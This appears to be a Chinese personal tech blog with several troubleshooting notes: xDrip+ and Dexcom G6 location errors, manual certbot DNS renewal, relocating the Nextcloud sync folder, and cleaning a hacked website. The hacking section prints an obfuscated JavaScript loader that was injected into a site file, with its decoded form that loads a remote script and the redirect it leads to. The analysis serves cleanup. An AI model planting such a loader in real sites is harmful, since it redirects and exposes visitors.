xdrip+在使用的时候，如果配套使用的是的dexcom g6传感器，可能会出现G6 State isn't currently known. Next connecion will update this提示信息，且没有5分钟一次的打点信息，同时在系统状态中，传感器状态为扫描状态，并且提示Localtion services needs to be on enable on andriod 6+。此时，查看事件日志，日志中提示:
Localtion services needs to be on enable on andriod 6+
com.polidea.rxandroidble2.exceptions.BleScaException:Location Services disabled(code 4)

此时应检查手机的系统状态，查看是否是“位置信息”被关闭了，如果关闭了，需要打开，然后重启下手机应该就能正常使用了。

刚刚，网站的Let's Encrypt SSL到期了，需要更新一下证书，但是不想通过80端口自动更新，想使用DNS验证的方式手动更新，
现在服务器已经安装过certbot，使用这个命令certbot-auto --manual --preferred-challenges dns certonly更新证书。
如果遇到这个错误：

Upgrading certbot-auto X.XX to X.XX.X...

Couldn't download https://raw.githubusercontent.com/certbot/certbot/v0.XX.0/letsencrypt-auto-source/letsencrypt-auto. <urlopen error [Errno 110] Connection timed out>

原因是：certbot-auto将始终尝试从最新版本中获取自身的最新版本。

解决方案：在命令后加 --no-self-upgrade 即可。即：

certbot-auto --manual --preferred-challenges dns certonly --no-self-upgrade

运行后，根据提示输入单个或多个域名，多个域名中间用英文逗号隔开，再次显示：

Please deploy a DNS TXT record under the name
_acme-challenge.XXXX.com with the following value:

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Before continuing, verify the record is deployed.

这时需要更新域名的_acme-challenge解析值，解析完成后，使用nslookup命令可以查到相应的解析后，再点继续。
具体查询命令如下：

$ nslookup
> set type=txt
> _acme-challenge.XXXX.com
Server:    223.5.5.5
Address:    223.5.5.5#53

Non-authoritative answer:
_acme-challenge.XXXX.com    text = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"

certbot提示证书更新成功后，重启网站服务即可。
lnmp重启nginx命令：sudo lnmp nginx restart

至此，SSL更新完成。

nextcloud这个软件已经用了好长时间，前段时间设置同步账号的时候直接默认下一步就过去了，但是现在发现文件自动存在了C盘。这几天看着C盘空间马山就满了，琢磨着把同步文件夹换个位置。

但是在软件的基础设置中，没有发现更换同步文件夹位置的选项。怎么办？

根据我的理解，一般都会有一个配置文件，里边应该放了相关的配置内容，现在我试试把这个文件找出来。

先下载好processmonitor，打开定位到nextcloud桌面客户端，然后开始抓信息。

经过查看，发现配置文件是c:\user\用户名\AppData\Roaming\Nextcloud\nextcloud.cfg

其中，Accounts节中列出了同步网址、同步用户名、本地同步路径和本地的同步数据库名称
`[Accounts]
version=2
0\version=1
0\url=https://XXX.XXXX.com:9443
0\dav_user=XXX
0\serverVersion=20.0.2.2
0\webflow_user=XXX
0\authType=webflow
0\user=@Invalid()
0\FoldersWithPlaceholders\1\localPath=C:/Users/yjj/Nextcloud/
0\FoldersWithPlaceholders\1\journalPath=.sync_e90b9cf48026.db
0\FoldersWithPlaceholders\1\targetPath=/
0\FoldersWithPlaceholders\1\paused=false
`
这里边需要修改这个localPath=C:/Users/用户名/Nextcloud/，把C:/Users/用户名/Nextcloud/修改为d:/nextcloud即可，同时需将原来的C:\Users\用户名\Nextcloud下所有文件都复制到D:\Nextcloud

关闭软件，重启电脑，开机试试能不能正常使用，没问题的话，删除C:\Users\用户名\Nextcloud即可。

刚刚，朋友发来信息，说他的网站登录后台会跳转到其他网站。我看了下，从手机上的登录后没有发现跳转问题，以为是他的电脑被装了插件。于是远程他的电脑，清理了一下系统，没发现问题，再次登录网站，访问同一个页面的时候还是会跳转，经过浏览器抓包发现页面跳转到了其他网站。

判断是网页被挂马了，于是开始查找网页源代码。在访问的固定页面源代码中没发现问题，但是引用了两个文件，一个是<!--#include file="Admin_Common.asp"-->，一个是<script language="JavaScript" type="text/JavaScript" src="../js/date.js"></script>

仔细检查了两个文件后，发现date.js文件日期有问题，明显是被修改过了


被挂了马并加密具体内容为：

var Uo1 = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65']('\x48\x45\x41\x44')['\x69\x74\x65\x6d'](0); var KSFnLmPDG2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']("\x73\x63\x72\x69\x70\x74"); KSFnLmPDG2['\x74\x79\x70\x65'] = "\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74"; KSFnLmPDG2['\x73\x72\x63']="\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x73\x64\x77\x33\x32\x2e\x63\x6f\x6d\x2f\x67\x65\x74\x61\x64\x6d\x69\x6e\x2e\x6a\x73"; Uo1['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64']( KSFnLmPDG2);

是url unicode加密。

继续破解加密内容，在记事本中将\x全部替换为%，var Uo1 = window["%64%6f%63%75%6d%65%6e%74"]['%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65']('%48%45%41%44')['%69%74%65%6d'](0); var KSFnLmPDG2= window["%64%6f%63%75%6d%65%6e%74"]['%63%72%65%61%74%65%45%6c%65%6d%65%6e%74']("%73%63%72%69%70%74"); KSFnLmPDG2['%74%79%70%65'] = "%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74"; KSFnLmPDG2['%73%72%63']="%68%74%74%70%3a%2f%2f%73%2e%73%64%77%33%32%2e%63%6f%6d%2f%67%65%74%61%64%6d%69%6e%2e%6a%73"; Uo1['%61%70%70%65%6e%64%43%68%69%6c%64']( KSFnLmPDG2);

利用站长工具urldecode工具（http://tool.chinaz.com/tools/urlencode.aspx）进行解码，得到：

var Uo1 = window["document"]['getElementsByTagName']('HEAD')['item'](0); var KSFnLmPDG2= window["document"]['createElement']("script"); KSFnLmPDG2['type'] = "text/javascript"; KSFnLmPDG2['src']="http://s.sdw32.com/getadmin.js"; Uo1['appendChild']( KSFnLmPDG2);

浏览器访问http://s.sdw32.com/getadmin.js，得到window.location='http://kumari-gra.com/parktons.com?adTagId=2e358950-a8f0-11eb-9027-0a0e703b78cf&fallbackUrl=net.domain.name?ref=' + window.location.href;

继续访问http://kumari-gra.com/parktons.com?adTagId=2e358950-a8f0-11eb-9027-0a0e703b78cf&fallbackUrl=net.domain.name
出现问题跳转的页面，至此解密成功。

修复比较简单，将data.js文件中的挂马内容删除就可以了。

去年买的服务器空间又到期了，重新换了个服务器，刚搭起来，看效果还不错。